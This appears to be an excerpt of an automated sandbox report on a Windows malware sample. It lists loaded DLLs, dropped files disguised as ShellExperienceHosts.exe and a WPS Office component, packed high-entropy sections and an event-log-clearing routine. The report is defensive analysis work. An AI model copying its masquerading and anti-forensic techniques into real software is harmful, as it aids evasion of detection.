Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kdscli.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kdscli.dllJump to behavior
Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: version.dllJump to behavior
Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: mpr.dllJump to behavior
Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: framedynos.dllJump to behavior
Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: dbghelp.dllJump to behavior
Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: srvcli.dllJump to behavior
Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: netutils.dllJump to behavior
Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: wbemcomn.dllJump to behavior
Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: winsta.dllJump to behavior
Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: amsi.dllJump to behavior
Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: userenv.dllJump to behavior
Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: profapi.dllJump to behavior
Source: C:\Windows\SysWOW64\timeout.exeSection loaded: version.dllJump to behavior
Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: version.dll
Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: mpr.dll
Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: framedynos.dll
Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: dbghelp.dll
Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: sspicli.dll
Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: srvcli.dll
Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: netutils.dll
Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: sspicli.dll
Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: wbemcomn.dll
Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: winsta.dll
Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: amsi.dll
Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: userenv.dll
Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: profapi.dll
Source: C:\Windows\SysWOW64\timeout.exeSection loaded: version.dll
Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: version.dll
Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: mpr.dll
Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: framedynos.dll
Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: dbghelp.dll
Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: sspicli.dll
Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: srvcli.dll
Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: netutils.dll
Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: sspicli.dll
Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: wbemcomn.dll
Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: winsta.dll
Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: amsi.dll
Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: userenv.dll
Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: profapi.dll
Source: C:\Windows\SysWOW64\timeout.exeSection loaded: version.dll
Source: C:\Users\Public\Bulete\program\ShellExperienceHosts.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{00021401-0000-0000-C000-000000000046}\InProcServer32Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tasklist.exe tasklist /FI "IMAGENAME eq ShellExperienceHosts.exe"
Source: wps_lid.lid-s8HDMqE8a6Xy.exe.lnk.3.drLNK file: ..\..\Public\Bulete\wps_lid.lid-s8HDMqE8a6Xy.exe
Source: Window RecorderWindow detected: More than 3 window changes detected
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
Source: S1Rv3ioghk.exeStatic file information: File size 4477216 > 1048576
Source: Binary string: System.Management.Automation.pdb source: powershell.exe, 00000011.00000002.2548437777.0000000006F32000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Windows\System.Management.Automation.pdbpdbion.pdbp source: powershell.exe, 00000011.00000002.2554932130.00000000080E2000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\dll\System.Management.Automation.pdb source: powershell.exe, 00000011.00000002.2548323378.0000000006F26000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\buildslave\unity\build\artifacts\WindowsPlayer\Win32_VS2019_nondev_i_r\WindowsPlayer_Master_il2cpp_x86.pdb source: S1Rv3ioghk.exe, 00000000.00000003.1701410511.0000000002B40000.00000004.00000020.00020000.00000000.sdmp, ShellExperienceHosts.exe, ShellExperienceHosts.exe, 00000003.00000000.1706516163.000000000040C000.00000002.00000001.01000000.00000005.sdmp, ShellExperienceHosts.exe.0.dr, backup.exe.3.dr
Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.pdb source: powershell.exe, 00000011.00000002.2548437777.0000000006F6F000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\System.Management.Automation.pdb source: powershell.exe, 00000011.00000002.2528351985.00000000028CF000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: ?COMCTL32.dllWINHTTP.dllcompiler: cl /Zi /Fdossl_static.pdb /MT /Zl /Gs0 /GF /Gy /W3 /wd4090 /nologo /O2 -FS -DL_ENDIAN -DOPENSSL_PIC -DOPENSSL_CPUID_OBJ -DOPENSSL_BN_ASM_PART_WORDS -DOPENSSL_IA32_SSE2 -DOPENSSL_BN_ASM_MONT -DOPENSSL_BN_ASM_GF2m -DSHA1_ASM -DSHA256_ASM -DSHA512_ASM -DRC4_ASM -DMD5_ASM -DRMD160_ASM -DAESNI_ASM -DVPAES_ASM -DWHIRLPOOL_ASM -DGHASH_ASM -DECP_NISTZ256_ASM -DPOLY1305_ASMLoad file into cachecrypto\x509\by_file.cunspecified certificate verification errorunable to get issuer certificateunable to get certificate CRLunable to decrypt certificate's signatureunable to decrypt CRL's signatureunable to decode issuer public keycertificate signature failureCRL signature failurecertificate is not yet validcertificate has expiredCRL is not yet validCRL has expiredformat error in certificate's notBefore fieldformat error in certificate's notAfter fieldformat error in CRL's lastUpdate fieldformat error in CRL's nextUpdate fieldout of memoryself signed certificateself signed certificate in certificate chainunable to get local issuer certificateunable to verify the first certificatecertificate chain too longcertificate revokedinvalid CA certificatepath length constraint exceededunsupported certificate purposecertificate not trustedcertificate rejectedsubject issuer mismatchauthority and subject key identifier mismatchauthority and issuer serial number mismatchkey usage does not include certificate signingunable to get CRL issuer certificateunhandled critical extensionkey usage does not include CRL signingunhandled critical CRL extensioninvalid non-CA certificate (has CA markings)proxy path length constraint exceededkey usage does not include digital signatureproxy certificates not allowed, please set the appropriate flaginvalid or inconsistent certificate extensioninvalid or inconsistent certificate policy extensionno explicit policyDifferent CRL scopeUnsupported extension featureRFC 3779 resource not subset of parent's resourcespermitted subtree violationexcluded subtree violationname constraints minimum and maximum not supportedapplication verification failureunsupported name constraint typeunsupported or invalid name constraint syntaxunsupported or invalid name syntaxCRL path validation errorPath LoopSuite B: certificate version invalidSuite B: invalid public key algorithmSuite B: invalid ECC curveSuite B: invalid signature algorithmSuite B: curve not allowed for this LOSSuite B: cannot sign P-384 with P-256Hostname mismatchEmail address mismatchIP address mismatchNo matching DANE TLSA recordsEE certificate key too weakCA certificate key too weakCA signature digest algorithm too weakInvalid certificate verification contextIssuer certificate lookup errorCertificate Transparency required, but no valid SCTs foundproxy subject name violationOCSP verification neededOCSP verification failedOCSP unknown certCertificate public key has explicit ECC parametersunknown certificate verification errorcrypto\asn1\x_info.ccrypto\pem\pem_info.cRSA P
Source: Binary string: H:\func_v12_i18n_202411_branch\Build\Release\WPSOffice\office6\addons\konlinesetup_xa\konlinesetup_xa.pdb source: S1Rv3ioghk.exe, 00000000.00000003.1701410511.0000000002F1A000.00000004.00000020.00020000.00000000.sdmp, wps_lid.lid-s8HDMqE8a6Xy.exe.0.dr
Source: Binary string: compiler: cl /Zi /Fdossl_static.pdb /MT /Zl /Gs0 /GF /Gy /W3 /wd4090 /nologo /O2 -FS -DL_ENDIAN -DOPENSSL_PIC -DOPENSSL_CPUID_OBJ -DOPENSSL_BN_ASM_PART_WORDS -DOPENSSL_IA32_SSE2 -DOPENSSL_BN_ASM_MONT -DOPENSSL_BN_ASM_GF2m -DSHA1_ASM -DSHA256_ASM -DSHA512_ASM -DRC4_ASM -DMD5_ASM -DRMD160_ASM -DAESNI_ASM -DVPAES_ASM -DWHIRLPOOL_ASM -DGHASH_ASM -DECP_NISTZ256_ASM -DPOLY1305_ASM source: S1Rv3ioghk.exe, 00000000.00000003.1701410511.0000000002F1A000.00000004.00000020.00020000.00000000.sdmp, wps_lid.lid-s8HDMqE8a6Xy.exe.0.dr

Data Obfuscation

barindex
Detected unpacking (creates a PE file in dynamic memory)
Source: C:\Users\Public\Bulete\program\ShellExperienceHosts.exeUnpacked PE file: 3.2.ShellExperienceHosts.exe.3320000.6.unpack
Source: C:\Users\Public\Bulete\program\ShellExperienceHosts.exeCode function: 3_2_03327490 wsprintfW,LoadLibraryW,GetProcAddress,MultiByteToWideChar,swprintf,RegOpenKeyExW,RegQueryValueExW,RegCloseKey,FreeLibrary,3_2_03327490
Source: initial sampleStatic PE information: section where entry point is pointing to: .tp6d
Source: S1Rv3ioghk.exeStatic PE information: real checksum: 0x69041 should be: 0x44b1e8
Source: yyzyBase.dll.0.drStatic PE information: real checksum: 0x3b14ca should be: 0x3bb6cb
Source: backup.dll.3.drStatic PE information: real checksum: 0x3b14ca should be: 0x3bb6cb
Source: ShellExperienceHosts.exe.0.drStatic PE information: section name: .tp6
Source: ShellExperienceHosts.exe.0.drStatic PE information: section name: .tp6a
Source: ShellExperienceHosts.exe.0.drStatic PE information: section name: .tp6
Source: ShellExperienceHosts.exe.0.drStatic PE information: section name: .tp6
Source: ShellExperienceHosts.exe.0.drStatic PE information: section name: .tp6d
Source: yyzyBase.dll.0.drStatic PE information: section name: .00cfg
Source: backup.dll.3.drStatic PE information: section name: .00cfg
Source: backup.exe.3.drStatic PE information: section name: .tp6
Source: backup.exe.3.drStatic PE information: section name: .tp6a
Source: backup.exe.3.drStatic PE information: section name: .tp6
Source: backup.exe.3.drStatic PE information: section name: .tp6
Source: backup.exe.3.drStatic PE information: section name: .tp6d
Source: C:\Users\user\Desktop\S1Rv3ioghk.exeCode function: 0_2_00B5C7F2 push ebx; ret 0_2_00B5C7F3
Source: C:\Users\Public\Bulete\program\ShellExperienceHosts.exeCode function: 3_2_03334345 push ecx; ret 3_2_03334358
Source: C:\Users\Public\Bulete\program\ShellExperienceHosts.exeCode function: 3_2_0334A168 push eax; ret 3_2_0334A119
Source: C:\Users\Public\Bulete\program\ShellExperienceHosts.exeCode function: 3_2_0334A0B8 push eax; ret 3_2_0334A119
Source: C:\Users\Public\Bulete\program\ShellExperienceHosts.exeCode function: 3_2_03342470 push ebp; retf 3_2_03342474
Source: C:\Users\Public\Bulete\program\ShellExperienceHosts.exeCode function: 3_2_03342471 push ebp; retf 3_2_03342474
Source: C:\Users\Public\Bulete\program\ShellExperienceHosts.exeCode function: 3_2_03342450 push ebp; retf 3_2_03342474
Source: C:\Users\Public\Bulete\program\ShellExperienceHosts.exeCode function: 3_2_6C7A12AA push ecx; ret 3_2_6C7A12BD
Source: C:\Users\Public\Bulete\program\ShellExperienceHosts.exeCode function: 3_2_10009DF5 push ecx; ret 3_2_10009E08
Source: C:\Users\Public\Bulete\program\ShellExperienceHosts.exeCode function: 3_2_1001FE9A push ecx; ret 3_2_1001FEBF
Source: C:\Users\Public\Bulete\program\ShellExperienceHosts.exeCode function: 3_2_0223CAFF push eax; retf 3_2_0223CB00
Source: C:\Users\Public\Bulete\program\ShellExperienceHosts.exeCode function: 3_2_0223CB07 pushad ; retf 3_2_0223CB08
Source: C:\Users\Public\Bulete\program\ShellExperienceHosts.exeCode function: 3_2_0223CB0B push 701000CBh; retf 3_2_0223CB10
Source: C:\Users\Public\Bulete\program\ShellExperienceHosts.exeCode function: 3_2_0223CB61 pushfd ; retf 3_2_0223CB64
Source: C:\Users\Public\Bulete\program\ShellExperienceHosts.exeCode function: 3_2_02239DCC push ecx; ret 3_2_02239DDF
Source: C:\Users\Public\Bulete\program\ShellExperienceHosts.exeCode function: 3_2_031B3D04 push ecx; ret 3_2_031B3D17
Source: ShellExperienceHosts.exe.0.drStatic PE information: section name: .tp6 entropy: 7.9916235972250025
Source: ShellExperienceHosts.exe.0.drStatic PE information: section name: .tp6d entropy: 7.90195668192099
Source: backup.exe.3.drStatic PE information: section name: .tp6 entropy: 7.9916235972250025
Source: backup.exe.3.drStatic PE information: section name: .tp6d entropy: 7.90195668192099
Source: C:\Users\Public\Bulete\program\ShellExperienceHosts.exeFile created: C:\Users\user\AppData\Local\Temp\backup.exeJump to dropped file
Source: C:\Users\user\Desktop\S1Rv3ioghk.exeFile created: C:\Users\Public\Bulete\program\yyzyBase.dllJump to dropped file
Source: C:\Users\Public\Bulete\program\ShellExperienceHosts.exeFile created: C:\Users\user\AppData\Local\Temp\backup.dllJump to dropped file
Source: C:\Users\user\Desktop\S1Rv3ioghk.exeFile created: C:\Users\Public\Bulete\program\ShellExperienceHosts.exeJump to dropped file
Source: C:\Users\user\Desktop\S1Rv3ioghk.exeFile created: C:\Users\Public\Bulete\wps_lid.lid-s8HDMqE8a6Xy.exeJump to dropped file

Hooking and other Techniques for Hiding and Protection

barindex
Loading BitLocker PowerShell Module
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
Source: C:\Users\Public\Bulete\program\ShellExperienceHosts.exeCode function: 3_2_6C74CCDF IsWindowVisible,IsWindowVisible,GetWindowRect,IsIconic,CopyRect,MonitorFromPoint,GetMonitorInfoW,CopyRect,CopyRect,SystemParametersInfoW,OffsetRect,GetSystemMetrics,GetSystemMetrics,3_2_6C74CCDF
Source: C:\Users\Public\Bulete\program\ShellExperienceHosts.exeCode function: 3_2_6C6F2E3D SetForegroundWindow,IsIconic,PostMessageW,IsIconic,3_2_6C6F2E3D
Source: C:\Users\Public\Bulete\program\ShellExperienceHosts.exeCode function: 3_2_6C6F2E3D SetForegroundWindow,IsIconic,PostMessageW,IsIconic,3_2_6C6F2E3D
Source: C:\Users\Public\Bulete\program\ShellExperienceHosts.exeCode function: 3_2_6C720ABE SetRectEmpty,RedrawWindow,ReleaseCapture,SetCapture,ReleaseCapture,SetCapture,SendMessageW,UpdateWindow,SendMessageW,IsWindow,IsIconic,IsZoomed,IsWindow,UpdateWindow,3_2_6C720ABE
Source: C:\Users\Public\Bulete\program\ShellExperienceHosts.exeCode function: 3_2_6C6F0BFE IsIconic,3_2_6C6F0BFE
Source: C:\Users\Public\Bulete\program\ShellExperienceHosts.exeCode function: 3_2_6C74B422 GetFocus,IsChild,SendMessageW,IsChild,SendMessageW,IsIconic,GetAsyncKeyState,GetAsyncKeyState,GetAsyncKeyState,IsWindowVisible,3_2_6C74B422
Source: C:\Users\Public\Bulete\program\ShellExperienceHosts.exeCode function: 3_2_6C743428 IsWindowVisible,IsIconic,3_2_6C743428
Source: C:\Users\Public\Bulete\program\ShellExperienceHosts.exeCode function: 3_2_6C74D4B8 IsIconic,GetWindowRect,IsIconic,GetSystemMetrics,OffsetRect,GetSystemMetrics,IsIconic,GetSystemMetrics,GetSystemMetrics,3_2_6C74D4B8
Source: C:\Users\Public\Bulete\program\ShellExperienceHosts.exeCode function: 3_2_6C74D4B8 IsIconic,GetWindowRect,IsIconic,GetSystemMetrics,OffsetRect,GetSystemMetrics,IsIconic,GetSystemMetrics,GetSystemMetrics,3_2_6C74D4B8
Source: C:\Users\Public\Bulete\program\ShellExperienceHosts.exeCode function: 3_2_6C74D4B8 IsIconic,GetWindowRect,IsIconic,GetSystemMetrics,OffsetRect,GetSystemMetrics,IsIconic,GetSystemMetrics,GetSystemMetrics,3_2_6C74D4B8
Source: C:\Users\Public\Bulete\program\ShellExperienceHosts.exeCode function: 3_2_6C74D5D3 IsWindowVisible,ScreenToClient,IsIconic,GetSystemMetrics,PtInRect,PtInRect,GetSystemMetrics,PtInRect,3_2_6C74D5D3
Source: C:\Users\Public\Bulete\program\ShellExperienceHosts.exeCode function: 3_2_6C74B6ED IsWindowVisible,GetWindowRect,PtInRect,GetAsyncKeyState,ScreenToClient,IsWindow,GetWindowRect,PtInRect,SendMessageW,PtInRect,SendMessageW,ScreenToClient,PtInRect,GetParent,SendMessageW,GetFocus,WindowFromPoint,SendMessageW,GetSystemMenu,IsMenu,EnableMenuItem,EnableMenuItem,IsZoomed,IsIconic,EnableMenuItem,TrackPopupMenu,3_2_6C74B6ED
Source: C:\Users\Public\Bulete\program\ShellExperienceHosts.exeCode function: 3_2_6C6DF7F4 IsIconic,GetClientRect,3_2_6C6DF7F4
Source: C:\Users\Public\Bulete\program\ShellExperienceHosts.exeCode function: 3_2_6C74D7DC IsIconic,PostMessageW,3_2_6C74D7DC
Source: C:\Users\Public\Bulete\program\ShellExperienceHosts.exeCode function: 3_2_0332B3C0 OpenEventLogW,OpenEventLogW,ClearEventLogW,CloseEventLog,3_2_0332B3C0
Source: C:\Users\Public\Bulete\program\ShellExperienceHosts.exeKey value created or modified: HKEY_CURRENT_USER\Console\0 9e9e85e05ee16fc372a0c7df6549fbd4Jump to behavior
Source: C:\Users\user\Desktop\S1Rv3ioghk.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\tasklist.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
